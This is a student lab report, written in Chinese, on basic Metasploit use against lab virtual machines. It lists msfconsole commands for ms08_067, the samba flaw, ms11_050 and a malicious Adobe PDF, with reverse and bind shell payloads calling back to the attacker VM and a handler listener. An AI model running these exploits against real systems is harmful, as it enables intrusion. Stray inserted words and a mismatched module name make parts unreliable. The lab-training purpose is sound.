20165214 2018-2019-2 《网络对抗技术》Exp5 MSF基础应用 Week8

《网络对抗技术》Exp5 MSF基础应用 Week8

1、实验目标与内容

  • 1.实践内容(3.5分)linux

    • 本实践目标是掌握metasploit的基本应用方式,重点经常使用的三种攻击方式的思路。具体我尝试了:web

      • 1.1主动攻击实践:
        • 靶机为WinXPEnSP3的ms08_067(失败,不惟一);
        • 靶机为Linux Metasploit的samba的“军刀”漏洞(成功,惟一);
      • 1.2 针对浏览器的攻击(靶机为Win7):
        • ms11_050,载荷为payload windows/metsvc_bind_tcp(失败,惟一);
        • 载荷为generic/shell_reverse_tcp(成功,不惟一);
        • 载荷为windows/x64/shell_bind_tcp(成功,惟一)
      • 1.3 一个针对客户端的攻击:Adobe(成功不惟一);shell

      • 1.4 成功应用辅助模块:scanner/http/options(成功,不惟一)。windows

  • 2.一些问题api

    • 2.1 用本身的话解释什么是exploit,payload,encode?
    • exploit:执行攻击
    • payload:执行攻击时所使用的道具
    • encode:对道具进行包装浏览器

    • 2.2.离实战还缺些什么技术或步骤?
    • 免杀技术吧,如今咱们还不能很好地实现真正意义上的免杀;还有就是咱们制做的后门程序都很简单,,通常人看都看出来是不正经软件了。服务器

      2、实验步骤

一:靶机为Linux Metasploit的samba漏洞

  • 1.打开kali与Linux Metasploit,测试两虚拟机之间可否ping通:
    网络

  • 2.查看以前写好的脚本
    tcp

  • 3.在命令行输入msfconsole -r msfcli.rc运行在以前我已经写好的脚本,攻击成功
    学习

二:靶机为WinXPEnSP3的ms08_067漏洞

  • 1.打开WinXPEnSP3虚拟机。将其网络链接方式改成NAT模式后重启。测试其与kali可否相互ping通:

  • 2.切换到kali虚拟机界面,输入msfconsole启动msf。启动后输入search ms08_067,出现了一条漏洞信息。

  • 3.输入use windows/smb/ms08_067_netapi

  • 4.输入show payload,出现载荷列表,发现有100多个载荷

  • 5.输入set payload generic/shell_reverse_tcp设置载荷。

  • 6.输入show options查看参数。发现源IP和目的IP还没设置,输入set PHOST 192.168.10.12set LHOST 10.10.10.128设定参数

  • 7.输入run开始攻击。攻击失败。(这里好多同窗都成功了哎,,不知道是否是下载途径不同的缘由。)

针对浏览器的攻击(靶机为Win7):ms11_050(因为攻击的步骤大同小异,接下来就不每次操做都截图了~)

  • 1.打开Win7虚拟机。测试可否与kali相互ping通
  • 2.在kali打开msf后,输入search ms11_050,查询跟漏洞相关的信息
  • 3.输入use exploit/windows/smb/ms17_010_eternalblue
  • 4.输入show payloads,查询有哪些载荷
  • 5.输入set payload generic/shell_reverse_tcp设定输入载荷
  • 6.输入show options,查看有哪些参数须要设置。发现还空缺的参数是LHOST和RHOST。输入set RHOST 10.10.10.132set LHOST 10.10.10.128设定参数
  • 7.输入exploit开始攻击,执行一段时间后卡在了以下界面:

  • 8.一开始我觉得是在攻击过程当中卡住了,等了一会后又重启了好几回,后来上网查后发现到这一步的时候须要在靶机上的IE浏览器上输入[攻击方IP地址]/*,而后才能回连成功。
  • 9.在靶机上打开IE浏览器,输入10.10.10.128/5214

  • 10.回到kali,输入ipconfig指令和pwd指令进行测验,链接成功:

  • 11.换一个payload:set payload windows/metsvc_bind_tcp
  • 12.输入参数后链接失败:

  • 13.再换一个payload:windows/x64/shell_bind_tcp,这回在Win7打开IE后输入10.10.10.128,回连成功

针对客户端的攻击(靶机为Win7):Adobe

  • 1.在kali打开msf后,输入search adobe,查询跟漏洞相关的信息
  • 2.输入use windows/fileformat/adobe_cooltype_sing
  • 3.输入show payloads,查询有哪些载荷
  • 4.输入set payload windows/meterpreter/reverse_tcp设定输入载荷
  • 5.输入show options,查看有哪些参数须要设置。发现还空缺的参数是LHOST和RHOST。输入set RHOST 10.10.10.132set LHOST 10.10.10.128设定参数
  • 6.提示在.msf/local下生成了pdf。

  • 7.将生成的pdf放到Win7上面去
  • 8.在msf输入use exploit/multi/handlerset payload windows/meterpreter/reverse_tcp后进入监听模式,设定LHOSTset LHOST 10.10.10.128,输入exploit开始监听。这时候切换到Win7打开该pdf,回连成功:

成功应用辅助模块(靶机为Windows 2008)

  • 1.打开Win 2008,测试与kali可否相互ping通
  • 2.在kali的msf下输入search auxiliary查找辅助模块,发现有1000多个。
  • 3.在经历了n屡次的尝试失败后终于找到了一个成功的:scanner/http/options

3、遇到的问题

-1.在攻击靶机为WinXPEnSP3的ms08_067漏洞以前,测试可否ping通,发现不能ping通。

  • 解决方法:这里是由于我根据教材的环境配置把XP设置为了内网,而kali在DMZ区,因此须要启动网关服务器才能够ping通。所以在这里须要启动个人第三台虚拟机Linux Metasploit

  • 2.在实验中,有时候靶机并不存在咱们想要攻击的漏洞,一个一个试又要花费很长的时间。在同窗的帮助下,我发现了能够用nmap来提早检测漏洞是否存在。不过这已是我在作完全部实验步骤以后才知道的了。我拿了一个我攻击失败了的漏洞(靶机为WinXPEnSP3的ms08_067)来进行尝试,在命令行输入nmap -sS -A --script=smb-vuln-ms08-067 -PO 192.168.10.128,发现没有该漏洞相关的字段,不过能够看到目标系统。

4、心得体会

  • 第一次看到这个题目的时候仍是感受比较欣喜的。由于我最近恰好在自学教材,因此电脑上有不少的靶机,对于msf命令的使用也比较熟练,作起来较为简单,出现的问题也较多的是在看不懂英文。。。不过我感受也不能就这样感到知足,由于实验毕竟是颇有限的,不少东西实际上是很理想化的,在现实生活中不可能奏效。每次在作实验的时候都会想要尝试一下比较“实际”的操做,好比链接到不一样网段,好比可以攻击比较新的操做系统而后不被发现等等。可是如今本身的这方面能力仍是比较弱,至今没有成功过。相信从此会成功的~
  • 同时,这周我跟着大佬们去参加了CTF。其实我也只是学了20多天的web模块,可是我仍是坚持要去体验一下,想看看这个比赛是怎么样的,也想看看咱们的课程和它之间的联系。我仍是很庆幸这两天花了不少时间来参加这个的虽然作不出来,但作的过程当中多掌握了不少课程内没有的知识。同时,国内那些大佬们也让我深深地感到自愧不如,虽然在电科院成绩还能够,可是真是没办法拿出去跟人比。之后仍是要多学习信安方面的技能,不能知足于校内,应该走出学校,多看看其余学校的水平。
相关文章
相关标签/搜索